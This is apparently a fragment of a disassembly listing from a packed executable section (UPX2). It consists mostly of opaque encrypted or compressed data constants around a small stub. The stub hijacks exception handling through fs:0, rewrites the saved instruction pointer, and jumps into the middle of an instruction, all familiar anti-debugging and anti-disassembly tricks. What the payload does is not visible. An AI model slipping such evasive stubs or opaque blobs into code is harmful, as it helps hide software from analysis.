dd 0BBAF2A46h, 16090E23h, 31C60C0Ch, 2C195394h, 0C1C3DC7Fh
dd 426940F9h, 81460461h, 20B2E7DFh, 0C1B9DE6h, 6F617638h
dd 0B7EAE45Dh, 7CA2AD1h, 67D22182h, 0E1E9F473h, 357F85CBh
dd 9C4A945Ah, 809A78FFh, 0A6540AF3h, 611BD736h, 0AB242774h
dd 0D4350421h, 71F0414Fh, 0EDE4F267h, 4F564DD7h, 5933FEFEh
dd 4F9FF168h, 716381D3h, 0D7154E6Bh, 0B3651BDh, 0B8F9335h
dd 87F7CD32h, 0E9D4C682h, 0CE7843ECh, 5F27ACC8h, 988B93A5h
dd 7C741EC6h, 0F7AA5B77h, 470A6A01h, 0A892D9CAh, 11050E02h
dd 0F582BF0Ah, 0DACDD707h, 0EBE0EED4h, 3168CAB9h, 894CA8C7h
dd 0F9ECAEB0h, 53464D6Ch, 3A41601Ch, 75117C63h, 41F5FB16h
dd 0C34F1FA9h, 5DBFF5CAh, 0EBD05C40h, 91E1DBFAh, 2D6E748Eh
dd 7F77ED8Bh, 0BB383E5Bh, 19362AABh, 0CE875123h, 0E605FB73h
dd 0BD1F5ABCh, 0EBE1E4D1h, 40064E0h, 0DF7AB0B1h, 0BB2AA505h
dd 51D1B533h, 0B8291F60h, 4D5C5078h, 73AABD79h, 0E3D6D96Fh
dd 88F69DDh, 5EF8B7A8h, 0C2D6DC0Ch, 273B21DCh, 71C5A923h
dd 0C0350B7Ch, 261828FFh, 2F8BFA20h, 976150Dh, 86C8FEC0h
dd 90542630h, 5DCF9884h, 0BAF77D9Dh, 2F5D1774h, 5B3DCAE8h
dd 2AC52C78h, 80B84A0h, 2DECF621h, 650625A0h, 3931B01Bh
dd 0A49EA4C0h, 90837921h, 4F56EE8Ah, 0DA0B431Ah, 0BB3D386Ah
dd 24171DD8h, 7CDC3C9Eh, 0D061A1F2h, 948B82B8h, 772192B8h
dd 0D28ED374h, 0E825B4BCh, 340F0E7Ch, 66CFD19Eh, 0A7A2976h
dd 0A98D01EAh, 13ECF30Fh, 0DFD1D745h, 96E68258h, 2C94F7F7h
dd 8E808606h, 0DF6DAD0Bh, 0DC455D51h, 3D2F35CBh, 0D1613A0Bh
dd 9C3C3B7h, 0EBDD6885h, 0F0CF65E5h, 88878DEAh, 0EEE9F58Eh
dd 43DD08E1h, 0E52A2959h, 211BBE20h, 5F555237h, 630675A9h
dd 82C6DF36h, 23891299h, 7B82B6D6h, 0A698B9ABh, 742F6157h
dd 4048F110h, 5877E6Ah, 0D27C621Fh, 1F11173Dh, 6D81935Ch
dd 8CBA8E91h, 0CC5539E2h, 37A59BECh, 0A4BCE46Ch, 57EAFC58h
dd 30546A5Dh, 463A3F33h, 7D4F75C4h, 1596F675h, 79E7DE22h
dd 0E9D78E7Bh, 7782E7D3h, 0F1C6CDECh, 1D84D0CCh, 6D504CB7h
dd 0AD614FE0h, 70031D9h, 9CCCED31h, 30E19598h, 2620DEFAh
dd 0CE9A9854h, 0AFA3A92Ch, 7909D3A9h, 795D6EE7h, 7021E5F8h
dd 0F6BC3D68h, 282C0C46h, 808AFC21h, 0F1D5C271h, 53417518h
dd 0BB9F9BA3h, 8EFB0F3Eh, 7A7FAAh, 6A6E4A18h, 0C72B4BEDh
dd 0CB282E5Ah, 29278ABBh, 0A1381312h, 8BA0B9B3h, 97E7A4BFh
dd 0C5D3DFA9h, 0DCE9EAC5h, 4051DEEh, 897C5509h, 0B666F5DEh
dd 0C49A4DE3h, 9BE6E1Ch, 85B0BEFDh, 737240F1h, 0AC82D3h
dd 9E9197A4h, 7D3B7815h, 0EA49E82h, 44CBC9h, 32252B47h
dd 5087BB4Ah, 1FDC5E14h, 278BF59h, 0A62D3321h, 0FE9D9391h
dd 70D08ECEh, 444DA41Ch, 7D38D96Eh, 26F5B45Bh, 0A619DCBDh
dd 8FB00B8h, 0CDB7E668h, 84C4CAE6h, 2256A4A6h, 9CBEBE60h
dd 0A7F271Dh, 0FBD14E35h, 4B0D6D07h, 1E49A5CCh, 0F6860D1Ah
dd 0F614020Eh, 0DEBA85A2h, 764ABDB2h, 0A8AA8EDEh, 0A70A105Dh
dd 8D346AB7h, 67672CD9h, 3DBBCB51h, 7913291Ch, 0A6B3E9Fh
dd 0EADCB77Bh, 0F443AEE4h, 0B8D3F784h, 4196DFDh, 977147B9h
dd 63565D39h, 48F3FFD0h, 9A2F2642h, 66881569h, 0F281EF3Ah
dd 8CCED4F1h, 0EAE62C2Ah, 0F2CE9E8Ah, 0A0601660h, 2CE968B4h
dd 0DF844E55h, 0EA2F4A1Eh, 953165B8h, 367BE45Dh, 0E476B0CFh
dd 0CDB84722h, 0C3C0F8A3h, 646895DFh, 52C29EC9h, 12DF7E79h
dd 0B63A667Eh, 250276B4h, 0C4D0D93h, 71D365DBh, 964721EEh
dd 0D2043EDAh, 2996AC99h, 0E0CEBAAAh, 1E6056AFh, 36F060E5h
dd 0D2A0065h, 2B217E85h, 8E70F514h, 0D7272106h, 0BA084A1Eh
dd 27A298EDh, 0A3A9FA25h, 123C228Dh, 5C3B0771h, 42363C3Fh
dd 0A2E476BCh, 0C301359h, 0DAC17EFAh, 5836CFDAh, 0BA9EA1B7h
dd 906C6137h, 7B87451Dh, 0AD8EA81h, 2442784Dh, 65274748h
dd 8999ED7Dh, 77F0C73Bh, 0D1FBAC73h, 0C45A01DBh, 0ABF5F590h
dd 0BAE91F5Ah, 0F0E06FBAh, 5A7E7A14h, 3F59EDDFh, 742AE16Bh
dd 279EB6E1h, 7B1EE833h, 0D3F6E661h, 96C83446h, 99199682h
dd 83E084B3h, 0EC5A5056h, 0F9B47932h, 3114043Dh, 22135BA0h
dd 6FC60A84h, 0DFE2F693h, 0EAC03052h, 8231A28Eh, 74632C61h
dd 6E06E905h, 91A515Dh, 6C616601h, 8208EC8h, 0F8AA002Ch
dd 0DCF4E494h, 0A2E60AE6h, 0D39284F1h, 0F7EFF2DEh, 0C0481CF0h
dd 9323509h, 640E7133h, 34D4B20h, 47063D04h, 0BDBEA254h
dd 0A88C89BFh, 0ACD1C8A5h, 0C9F6DCC8h, 0E011F6D5h, 2D170CD5h
dd 203A2B38h, 48485039h, 417A4B69h, 4593986Bh, 9AB9819Dh
dd 0AF919B90h, 0D6CBCDBAh, 0EBF9F4D9h, 0F1930CEh, 0E342C12h
dd 2B551030h, 70664628h, 7F657E75h, 919A8E6Eh, 0BCA2A1BFh
dd 0E3D7D4BDh, 0CCE3E8F8h, 0F315F0F1h, 1E2003E6h, 302F2018h
dd 5742452Ch, 514C655Ch, 181887Fh, 0B29CAFA8h, 8EED84B7h
dd 0D3CDE799h, 0FAFAE0D8h, 2D3200E9h, 3037371Dh, 7644D2Eh
dd 4C6F514Bh, 6B547C4Dh, 9D8F9E75h, 0AF8E8D82h, 0CEDFDAA1h
dd 0F595E9D3h, 0E31DF2FAh
dd 18302DF4h, 50464A11h, 0AB697F4Ah, 687E2C17h, 939B817Ch
dd 88A3B3D6h, 0B8D0ACAFh, 0C3C889A3h, 0DC86E3C1h, 572032C5h
dd 31382F16h, 2B595824h, 63497531h, 419E2572h, 0D0ADA34Ah
dd 0A7A1B8CCh, 0B09EC6BBh, 9F9270E1h, 52A7D99h, 597CB093h
dd 21C48163h, 33261C5Dh, 326A84D2h, 142EF621h, 8BE8AEE9h
dd 0D30C34C5h, 0F29E94EAh, 0E5ADB509h, 4BE908A0h, 79384E90h
dd 141385D9h, 529C1D09h, 6F59551Ch, 0AC656AA6h, 5CC5FBC1h
dd 8883D848h, 0DB066FB2h, 7C3AF66Dh, 8558EE87h, 0C160AFAEh
dd 13680C3h, 16625E2Bh, 6F13FD65h, 0DFE1FD8Dh, 0CC92C05Ah
dd 41DDD4BAh, 8E8086ABh, 5D262DDBh, 58061C29h, 177EA0ADh
dd 0E21F1A07h, 493EB6Fh, 12A00C50h, 453D371Ah, 0B59787C7h
dd 98F8522Ah, 7499A76Bh, 37565C79h, 6640218h, 62640810h
dd 86FA0B64h, 0F7D9DA5Dh, 23378219h, 0C1B85129h, 0F5CD9EBBh
dd 0B94ED1E5h, 3C2E2CABh, 24D2B26Ah, 0D22C0265h, 1F11173Eh
dd 71868F6Fh, 8EAF8F94h, 3290C6A3h, 828FA652h, 8E0F19ACh
dd 736F45BBh, 5FD9D747h, 0CF390F42h, 1B3503C5h, 85FC5825h
dd 0F4D7C478h, 0D9C8BA7Dh, 0B3CB7D3h, 0A3A685F3h, 85C60CC4h
dd 856056A9h, 0ADBAB8C7h, 0A7AFF72Ah, 1C0F2511h, 92517945h
dd 0E5D9EFDAh, 0EAEE5152h, 0FBF3A9F4h, 94E28FC3h, 796F1BDCh
dd 0CBADD873h, 43071649h, 5D46E2B8h, 8E8C8A00h, 0A3E5DC26h
dd 6347D681h, 0BB9F9540h, 0F0C4CCE1h, 10862DCBh, 6A6E4F6Ah
dd 42D6B63Ch, 0F2281E62h, 29203DABh, 0EF19F812h, 1D292304h
dd 0F7A9BC51h, 0E02561C1h, 0C785BBB3h, 9E592FDFh, 0A4B0A78Dh
dd 5578BF92h, 714F1F0Ah, 0E4163040h, 281D16F6h, 0E4D2816Ch
dd 0E6D4E4CEh, 6C4E7F87h, 6B18367h, 686B7431h, 19362334h
dd 0B7A8E274h, 173A3E53h, 0AABFA441h, 0B18288A5h, 0EFD12B25h
dd 3F62A38Fh, 8FB2A2C5h, 1788548h, 5940BA1Ah, 76623753h
dd 73574B74h, 44BF2F54h, 7820E64Eh, 0D2F4E096h, 0B7A9A324h
dd 0CFC6C7B1h, 0E0250DF3h, 273D2B17h, 0DEC21360h, 30120248h
dd 3AB280B9h, 91EBC225h, 0DED0D63Bh, 3CB5D18Eh, 98B0ED28h
dd 33EA08A2h, 0FF645A98h, 6762B8D1h, 6B7C6251h, 0B0A8CC9h
dd 0C17BFE2Ah, 31486EF3h, 9FC2F8FBh, 0E2A6C79Eh, 998EFAFCh
dd 0AD8EF793h, 9CACF190h, 7A86C2A2h, 2D201657h, 9A6D0053h
dd 9E9F018h, 0EBE44D65h, 0C0BF51D5h, 0F6CF9EBAh, 0B936C0D0h
dd 232646B6h, 0C1B84D25h, 391C183Fh, 1E167FA0h, 0B77BFC17h
dd 0E7EBF95Eh, 117D4BB8h, 59A59BECh, 6975629Bh, 7B6F7978h
dd 2E1D0D75h, 117C7113h, 66526011h, 7E96F624h, 76E7DE22h
dd 0ED48DD2Dh, 2EB1B7D0h, 0A29699DFh, 67CE0C9Ch, 35605699h
dd 7BBCF6EBh, 0CFC2307Bh, 98F0EAC1h, 0CFD907A9h, 60D7DEF9h
dd 0C9BDC1CEh, 0AF324442h, 0FBD38DA8h, 786C738Ch, 778CC28Dh
dd 86B73C67h, 271B20ACh, 66D48D71h, 651BB905h, 0D5F9E517h
dd 0CFF7744Ah, 8C1BF1B9h, 11877E99h, 696D49E7h, 0F3C1AA88h
dd 33170DDAh, 9525672Dh, 0CCD06194h, 742A8BF6h, 0C68AEA32h
dd 2F906545h, 90848B2Ch, 0FE652F01h, 0D57EAB6Fh, 0F13ABD1h
dd 0A9DD839h, 8FD3333h, 0EF8BE869h, 4639CE82h, 0B89B9B38h
dd 926F6E31h, 82741B13h, 0F2D7F37Ch, 4C0F65EFh, 62763A2Ch
dd 3CEC9AD4h, 3A68F43Fh, 0DE925DFBh, 793ABDD9h, 0A9AC820Eh
dd 8F698F12h, 1B99937Fh, 584B51F9h, 0B4D61D0Ch, 0DD413F03h
dd 37D06589h, 52636801h, 60C3F9C6h, 404A46CAh, 0E006C4Fh
dd 8042583Eh, 713F5D10h, 183C425Fh, 0DEB4D817h, 99063C03h
dd 75FED549h, 0EDE1AA67h, 74BBEAD7h, 83DD14B6h, 849E45B5h
dd 63622384h, 1C5A4C21h, 1F693853h, 2FF3983Dh, 55FF1DD8h
dd 0F9F8A6F5h, 4391F51Ch, 838D8375h, 989779ADh, 53557692h
dd 4C752341h, 7D1A6E7Ch, 23A0064h, 6921721Eh, 0FF9BCA2Ah
dd 94849CA5h, 40E5B8F4h, 94BD842Ch, 25B8039Eh, 4616783h
dd 111C68h, 12DAA4B2h, 909B1602h, 1C5EE24h, 0FD39E091h
dd 9AB20C8Bh, 0B0A4AF2Dh, 0F1ACA9AAh, 85397485h, 6F7940E1h
dd 48FCBD59h, 4116C86Eh, 0E02082Bh, 0D222508Ah, 849CD1DCh
dd 9641232Eh, 61109B86h, 33F7D4E5h, 6B6F4EAFh, 4576EFE6h
dd 0B8292F7Ah, 2A233AA2h, 943CD213h, 0B0818CF8h, 0E2515722h
dd 5522A7F2h, 3A9F2A7h, 0C2E68F07h, 5C607D5Eh, 0EFC736E6h
dd 0CE7A304Eh, 0F400F3CAh, 13F49864h, 0D4BF43E3h, 75265924h
dd 221F569Fh, 844756B6h, 9EDBC68Dh, 0B112FE88h, 30CCDDDh
dd 77B6912Dh, 0FDEFC604h, 0D1BCF082h, 39B9BFAEh, 9BB43D55h
dd 0BE3E09A5h, 75685EA7h, 0DF8A421Bh, 3F0218C6h, 24171D39h
dd 24D287D8h, 7E0E733h, 2C3A35E0h, 0B8AE7290h, 0B0A0203Fh
dd 7D227AA7h, 57731EE9h, 0B3C6C761h, 3198AD49h, 93810E2Bh
dd 0FADCDD3Ch, 2087D79Eh, 0F49C314Ch, 0A65B24BEh, 8E802227h
dd 23A54088h, 8493A3Dh, 3D473438h, 74D41A37h, 2CDC6AE4h
dd 135EE430h, 0DA46C71Ah, 3CA7ADC9h, 0AAA2A52Ah, 44FCFA94h
dd 0E9566C57h, 791502CBh, 44727743h, 86FA5B28h, 0F7D9DA45h
dd 0D3312C72h, 0C1B16152h, 5998F4BBh, 0BB53B415h, 35F79785h
dd 0D6477D40h, 0BE23CDB7h, 1F1115F5h, 2DBD7991h, 21E8E1CDh
dd 9D9105E1h, 0E3A1C196h, 0B9BD2553h, 0E99075A1h, 6164705Fh
dd 0C236FFDEh, 2B1E26DDh, 958AC016h, 0F4D7C046h, 0B19D83BFh
dd 0BEBEB7CCh, 0D60363E8h, 0D7BB1B7h, 3BE46942h, 0DB454B65h
dd 70463C9h, 5784D631h, 5E76422Dh, 37EADFFAh, 3B4905DCh
dd 2A2A4833h, 94B8A0F6h, 0C1513805h, 5E524273h, 8234EF6Bh
dd 0C9EBD3CAh, 235682ABh, 0FE26EC36h, 2FCC9B5Ch, 0E8228333h
dd 0E32395ADh, 0CCA97C8Eh, 6976A514h, 1079C8B4h, 0CD46473Eh
dd 9A440D5Ah, 8FF0F468h, 0DE9D5728h, 0C4AF8357h, 0E82DB683h
dd 487274EEh, 0F351B1A8h, 5B7F7B3Bh, 4BF6396h, 0AD90131Eh
dd 0AFE04A7h, 64212937h, 59CC2626h, 89819D73h, 411A6BB3h
dd 0BFDAB5ABh, 545D131Ch, 61423118h, 6E198167h, 3936FC58h
dd 0FBD22864h, 28303180h, 8085BF51h, 0DE9DE6E7h, 0CCD1B5AFh
dd 0F1686DDBh, 0A6B3AD27h, 690C34D8h, 2C555271h, 0F7043D99h
dd 0AE88DBFDh, 56CB84B2h, 485650FDh, 0AFCDC38Ch, 0A7F776A4h
dd 5BA7A184h, 4691030h, 0CF39AC4Ah, 0CE34F2D5h, 615B1E6h
dd 0D054D90Ch, 0F04A4427h, 0A88C486Fh, 0E39785A2h, 9A9B9578h
dd 57494F6Ch, 0BCC3B50Ch, 0C8132911h, 5F8FF05h, 61EF1C9Bh
dd 0FFEC9B51h, 962EC9C9h, 0D4B213C8h, 76F478C9h, 0E8565C79h
dd 96387D03h, 7D1BA724h, 0EA800462h, 1E9F00Bh, 0FBCEC2B3h
dd 45BCB9D5h, 0A5989E51h, 8821C069h, 6F83EC8Bh, 2AC64D69h
dd 190C126Eh, 0CA951813h, 0EAF6FC17h, 18241F33h, 0CC0944EEh
dd 0F32EABC6h, 86C01BA3h, 7F1CB4BBh, 65BF9A46h, 0FB0F759h
dd 719BAD2Fh, 0E703390Ah, 0C181076h, 0D8CC7D05h, 0EA2C3CD2h
dd 0A196AC99h, 0B755DA01h, 91F68E81h, 0D54AB499h, 362A30C4h
dd 355CA0BBh, 0A178FA24h, 0C06DDC5h, 36423DA1h, 0E423D5B1h
dd 9387ED8Ch, 2E92F96Dh, 0D0452D71h, 72263CE2h, 3761223Ch
dd 0C068698h, 5517BC05h, 0D72ACE5Bh, 0E4F1103Ch, 0DA296E6h
dd 84FAF914h, 0E03B637Eh, 0B1BDD5F3h, 0D4BBC5B7h, 9356EDD2h
dd 0B6F3FB5Bh, 0E79456E6h, 4F9283F0h, 0AB9FFA47h, 0B0C24DA5h
dd 55494FAAh, 0D1661FE6h
dd 0BAB8291Eh, 2428306Eh, 7AF54927h, 0E6AB6100h, 50D68EE9h
dd 33ABE9AEh, 0ADBEC937h, 8A377A97h, 540A237Dh, 6EB421B3h
dd 6926A522h, 383EB2A8h, 0F5EDF43Fh, 202F6470h, 97024226h
dd 569C9290h, 0BEAB1A36h, 3CD39388h, 0A74B6143h, 0D1A37C7h
dd 19989637h, 8AFA3032h, 0DCF0A694h, 0BB9198E6h, 811D51CBh
dd 648DA39Eh, 0B058ED00h, 52E2A27Ah, 0B53C7271h, 1F0B26D1h
dd 3BB38129h, 7EAC120h, 0EDE1E647h, 574BECD7h, 0A7A9B531h
dd 0A2492122h, 0B26369B6h, 56484E83h, 3A476E50h, 933F5B4h
dd 0F4AFFD29h, 915923F1h, 4BC1F7F6h, 7B256F08h, 59846152h
dd 4D650E17h, 72689877h, 323A6A5Ch, 509E435Dh, 60680602h
dd 1D88FC7Fh, 25322C2Bh, 235ABDA1h, 4C686244h, 76837D4Ch
dd 439E49E2h, 41721A10h, 382B14F5h, 0B8F87632h, 740A04E9h
dd 0C29E6BC2h, 0E40A48D0h, 3BA49AE8h, 14EF87FAh, 96C72B5h
dd 5F3B0F51h, 0CF38C159h, 7B1D49FAh, 0D797F773h, 71E6DD2Dh
dd 0E94AD928h, 0E08F898Dh, 671698C3h, 7B33689Fh, 14B79A7Fh
dd 31BBB59Ah, 355D9789h, 0ABE5142Fh, 0FEF2D6ABh, 0E3C735F8h
dd 0E87EC2DDh, 0AD911FC2h, 916E8CA7h, 0B56B718Ch, 8DD5655h
dd 6FF83772h, 5A1AD8B8h, 0B176539h, 7BE3EA05h, 88F8EABEh
dd 572CA944h, 9FA2B15Fh, 7B98C271h, 6D9E0381h, 80h dup(0)
; =============== S U B R O U T I N E =======================================
sub_3150CC00 proc near ; CODE XREF: UPX2:3150CC32�p
pusha
push ebp
mov ebp, esp
call loc_3150CC13
call sub_3150CC80
jmp near ptr loc_3150CC37+1
sub_3150CC00 endp
; ---------------------------------------------------------------------------
loc_3150CC13: ; CODE XREF: sub_3150CC00+4�p
push dword ptr fs:0
mov fs:0, esp
xor ecx, ecx
push 80000000h
push ecx
push ecx
push 100h
push ecx
push ecx
push ecx
push ecx
push ecx
call sub_3150CC00
loc_3150CC37: ; CODE XREF: sub_3150CC00+E�j
xor eax, ebp
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 0C2815A00h, 50h, 0F381DB31h, 243Ch, 1ABFh, 28A5200h
dd 86F83166h, 1C28302h, 0E3C78166h, 0DB094B00h, 675AEC75h
dd 2E8764h, 64E58B00h, 68F67h, 86D8D00h, 245489C9h, 0E2FF6114h
; =============== S U B R O U T I N E =======================================
sub_3150CC80 proc near ; CODE XREF: sub_3150CC00+9�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3150CC80 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 8Ah, 15h, 0E0h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 0A6h, 89h, 0E7h
dd 78E2164Bh, 84A19AF0h, 902D4A67h, 0B5154E7Ah, 74CE627Fh
dd 99A5EA2Fh, 0F0D4236Bh, 0CCE92F93h, 71C12A26h, 5C811E3Bh
dd 708D8EE8h, 0FF1443BBh, 8881F247h, 166AC56Bh, 0A856E908h
dd 878FE08h, 8B2AF20Fh, 0C5F42BC0h, 0D5E92E4Bh, 0DD7996B3h
dd 17F522DCh, 727C2F34h, 8B1D7A47h, 1ADE29Fh, 58016EDAh
dd 0A4C167FBh, 94BE6A87h, 0E8978D92h, 3D16EBF7h, 0E8B28526h
dd 6659E3Ah, 0A9591EC2h, 9314BABBh, 4213F5Bh, 0C0262892h
dd 97EA550Bh, 0E24EC28Dh, 65A26D93h, 411EF9BAh, 0B6979DBh
dd 0C380664Ah, 3482E63Ah, 856E4535h, 7BE137C1h, 7A41261Eh
dd 0EC30C79Eh, 534E3F7Ch, 4ECC9203h, 0FB082B58h, 4FC5F232h
dd 5334AED5h, 0D84E19C0h, 74FF29F1h, 0C09AD548h, 686EB950h
dd 0C29466Fh, 0EBDABEACh, 4A20161Eh, 0B0A88663h, 0B58F89C0h
dd 88D03E9Ah, 547C66ABh, 92BE1A37h, 9FDC7A6h, 9670440Ah
dd 0D7A1FFAFh, 95A49C98h, 9CF9E3B3h, 28456F97h, 0C0B4A90Bh
dd 342E1BDBh, 0A39B7466h, 0A72692DDh, 0A08497EDh, 988DEAF2h
dd 0FC193623h, 0A9D1025Ah, 50A4B13Bh, 25BD9AC2h, 0A1591343h
dd 0F8C4208Ah, 0BB31F49Bh, 0D0ED64CFh, 0A3057DB3h, 0A8301EAAh
dd 451459CBh, 1D7A63h, 0F829C6E3h, 2D80DF71h, 2FC19ECFh
dd 94494EFBh, 0E447DB6h, 0C365C2A6h, 94C8B89Eh, 0DAC011B7h
dd 0B109667Ah, 78FFE80Ch, 44B3E31h, 91C5CA8Dh, 97395273h
dd 0F8C5883Bh, 0F0DA62E1h, 948B18E8h, 4C69B5FCh, 21DDB1Ch
dd 0E97E6144h, 0B01C8BD2h, 2DC8E4D3h, 48B0BD0Fh, 17B18EDEh
dd 0AAFE7AB3h, 8E965FF1h, 2865728Fh, 2637FC5Bh, 4BF5495Eh
dd 648C5EA6h, 95C68A2Fh, 4C71B33Fh, 10B8D187h, 74C94EC6h
dd 74C4FF74h, 0D5D2564Bh, 87C83BDh, 0FD473B2Ch, 42162ACFh
dd 7E5EEE8Ah, 0FB9F32A5h, 2D177B72h, 0CEB79A1Fh, 0BF8470FCh
dd 892D62A4h, 5191AB4Ah, 0C5084AAFh, 0CB17340h, 0E5505BF4h
dd 0B4497BCBh, 0DEDD240Eh, 83A11648h, 0DD1957E8h, 0ECB8FE23h
dd 4E1E550h, 2711C69Bh, 0F85726E0h, 54C1ED30h, 0E99D5A0Fh
dd 3CF4266Eh, 21230AF7h, 0A4735E83h, 850D9F50h, 0C34267Bh
dd 0E66C5608h, 79DE71ACh, 8065FACAh, 258E5D8Bh, 0A84D0823h
dd 54B9D3A2h, 8528AA4Fh, 6C919458h, 9A02D714h, 1FC98270h
dd 93DD7023h, 0A90C6FEBh, 8EDB80Ah, 18D235B0h, 0E159DE6h
dd 0E426FA3Ch, 0D85C1244h, 1D95BECh, 0C436BA7Fh, 53E113EBh
dd 97F3E013h, 8493E91Ch, 508D6BA5h, 4411461Fh, 38BCB227h
dd 0E1793B4Ch, 2090DADFh, 2C47264h, 0C8071D88h, 2499B653h
dd 302F8A2Bh, 1B3D4E7Ah, 0F04D53EDh, 74C80ED2h, 75A5EF00h
dd 1689564Bh, 0D7CD83D7h, 840CEE36h, 9020C28Fh, 0B8B8065Bh
dd 92820D99h, 1E8AB773h, 0B5AA9035h, 0BC418317h, 0BEED35Ch
dd 24EC6E7Eh, 0F48A4AEFh, 0F30E98CCh, 58DD942Fh, 0F05D0093h
dd 7F3576F3h, 9C949EDEh, 9B384F17h, 3779BE74h, 0D86786h
dd 1D1186AEh, 0FED5A1ACh, 0D7A92E31h, 20A0A2A2h, 0F8CE76EBh
dd 0B7129CF4h, 91CDDB08h, 0C03A0AEFh, 5934A93Ah, 939D9234h
dd 0B47C66D6h, 0C105057Fh, 0AF835304h, 2DC60217h, 44F90BFBh
dd 9FA4DAF0h, 2CE26F5Eh, 0A470F9E7h, 77E92EC6h, 0A1A4E5D6h
dd 0F77B3A4h, 0FA45A277h, 69A661BEh, 0B03384D2h, 0E6BE6D7Bh
dd 2784E447h, 0D50ACA63h, 3F5D03Ch, 5C4BC132h, 0DD805AFDh
dd 84B96B7Ch, 50E57676h, 0A145CD1Bh, 0C743FF23h, 7F4F514Ch
dd 0E058DE12h, 9A41F66Bh, 0CC2A6FDCh, 887DECA8h, 0CBA72149h
dd 8259A6D1h, 131D52EEh, 0FFC9641Fh, 28F5103Bh, 14E1560Bh
dd 7A9CC2BDh, 3B69B0C9h, 0D010CA1Ah, 28D25E5Bh, 91B39A27h
dd 0C0E2EE73h, 0ECDE9A35h, 0BC6BF6C1h, 0E27F20DDh, 0D1776C3h
dd 70EF4AEFh, 5C0E0CAAh, 6D390738h, 0ED564ED3h, 43AC53Ah
dd 235EEB6Ch, 0F88D779Ah, 70C0FE23h, 5B65EA45h, 2DB43574h
dd 0F82D324Ah, 182CA333h, 9F951A0Bh, 9C54FB0Bh, 1AED22EFh
dd 9185CB7Ch, 0A62D0AEFh, 80B1263Bh, 6DF6BD68h, 9D3BDE23h
dd 0A5199309h, 0FD37B3ECh, 0E928773Bh, 0D1466E23h, 10E59F47h
dd 599D0352h, 2CAD72A7h, 6B834E99h, 95398F20h, 0FC04366Bh
dd 9E92D768h, 0B20F9C29h, 0F16F1EE4h, 8C600E29h, 0BD0E1247h
dd 41EBAB57h, 69C7EA58h, 394DFFBDh, 3E0D27F0h, 0B1B5EB1Ch
dd 946E6A8Fh, 7CC7104Dh, 0AD42E571h, 0D4699B63h, 0B7051E1Ch
dd 0C97D6394h, 0C807E237h, 0B166DC69h, 3005BF5Fh, 4C308E02h
dd 7936C587h, 20ED025Ah, 0EC6085A8h, 2FE1163Eh, 14680121h
dd 0C439FE95h, 5DA7DDBh, 0EC1133EBh, 0A40932E2h, 10976D35h
dd 54AA742Dh, 0BC6BBE8Fh, 1DD208DDh, 64992B6Bh, 0ACF18A6Ah
dd 8CC8E68h, 91EE92C7h, 8D39AD02h, 0C003063Ah, 5D89634Bh
dd 0E8806CD6h, 542DAE63h, 8035BB19h, 0C48439C8h, 3D3D7292h
dd 5BDD77F3h, 68B12EE0h, 4AFDF364h, 0E40562B7h, 0F7E6A17Eh
dd 85F99F50h, 545A267Bh, 19B51686h, 0B1E8E53h, 8040C6EAh
dd 67843F8Bh, 0E1C0FDA8h, 1CE16623h, 108C640Fh, 6CDCE3DBh
dd 78FD73E7h, 94E96EF3h, 0A0D51ADFh, 6FD7672Bh, 3DE537C8h
dd 0BDF29E03h, 85C54EC3h, 4F9F0480h, 0AB3C501Bh, 59E88076h
dd 62FADE5Ah, 2842F3A1h, 5B5A1EE4h, 0EDAF21D1h, 50901EBDh
dd 5EE53577h, 38D3D74Bh, 0B54CDCF0h, 8953BFEBh, 0FC009307h
dd 0A9089034h, 4DDFBB77h, 5108EF43h, 2258D6CBh, 0DB1D13E0h
dd 0A86BA1h, 2F872A9Ah, 6F923368h, 5A8E8296h, 0A14DDFC6h
dd 0FF484FDDh, 8405632Fh, 9C1C9715h, 711BAD73h, 7430EE3Eh
dd 0DD64C4C3h, 0FA6E22D3h, 1AD7FA6h, 1CEA25BBh, 7C9D0393h
dd 368EA0F4h, 0DC7A3EF2h, 0C5354ED0h, 88D57F33h, 89E8B07Fh
dd 6D3FFE07h, 0B9318F23h, 0C345A3F6h, 0CC4E4BF4h, 3DFD4356h
dd 27953F72h, 1587028Eh, 3CAC079Bh, 0C6702CF7h, 0C3A07EDAh
dd 0A9F6267Ah, 74F49473h, 8E20DD36h, 0A532FA1Ah, 0F00890FFh
dd 0C5245632h, 21FE3E46h, 74CAE77Bh, 24B4EAAEh, 14991C86h
dd 0D3E92F96h, 0C5816EBAh, 55C74646h, 69E3C75Bh, 0E418FB2Eh
dd 0A471AF28h, 0DC018B1Eh, 99356626h, 40EC8913h, 73C7DF69h
dd 5C4FF9A2h, 3E7927D0h, 0ED8A0C86h, 28A004A0h, 43DD465Ah
dd 51F1D646h, 0A648DCD1h, 0AD159BE6h, 9517860Ah, 0AE229512h
dd 41F5B745h, 5535C52Fh, 2058E0D5h, 0E87C1FE2h, 13A767A3h
dd 30BA7ABEh, 6EB1386Eh, 5BA8E1B8h, 0B669BED0h, 0E34049E0h
dd 0AA633528h, 8C0E800Eh, 7B1BBE73h, 5326FF3Ch, 0D94F8498h
dd 0DB2D56CFh, 0D9F6AA6h, 4C42F83h, 6E98148Fh, 2BB8E6B2h
dd 0D15A4ED2h, 0EC5C7CCBh, 0B1C8422Eh, 84DEC272h, 4099B06h
dd 0A416931Ch, 0C545ABFEh, 0D76957CAh, 31C54775h, 5F8334Bh
dd 11AF23EBh, 21BB1296h, 0C25629E6h, 0D5A963E9h, 0BED8703Bh
dd 74FCA773h, 9B25E212h, 0B222FA1Ch, 0DA04A2E2h, 0A8286E3Eh
dd 20F84A6Dh, 64D6DF65h, 1AB8F48Bh, 1F981E8Eh, 0FBBD1D96h
dd 0A0BB7FB4h, 4EC24265h, 6DD9C352h, 8135F705h, 0B371846Fh
dd 0F8108309h, 0B72F4222h, 47FAAB70h, 43C1F43Fh, 2840F3B9h
dd 77F12F2h, 0F78A1B80h, 1EE5128Ah, 49E3056Fh, 6BD8C646h
dd 0BD5DCDD6h, 0AE15B4F0h, 8C20BB1Fh, 0BF088B21h, 41CAB84Ch
dd 5F2CFE4Ch, 387FA6D5h, 0F67822C8h, 11A56795h, 0F8134FFh
dd 4C8F337Bh, 4DAEEDA5h, 0AB6DCDD0h, 904B4FE4h, 9E017215h
dd 9B188608h, 6600B807h
dd 4C34EF2Bh, 0D36CD3E6h, 0C62D5BC5h, 0DAB49B7h, 19D32F9Bh
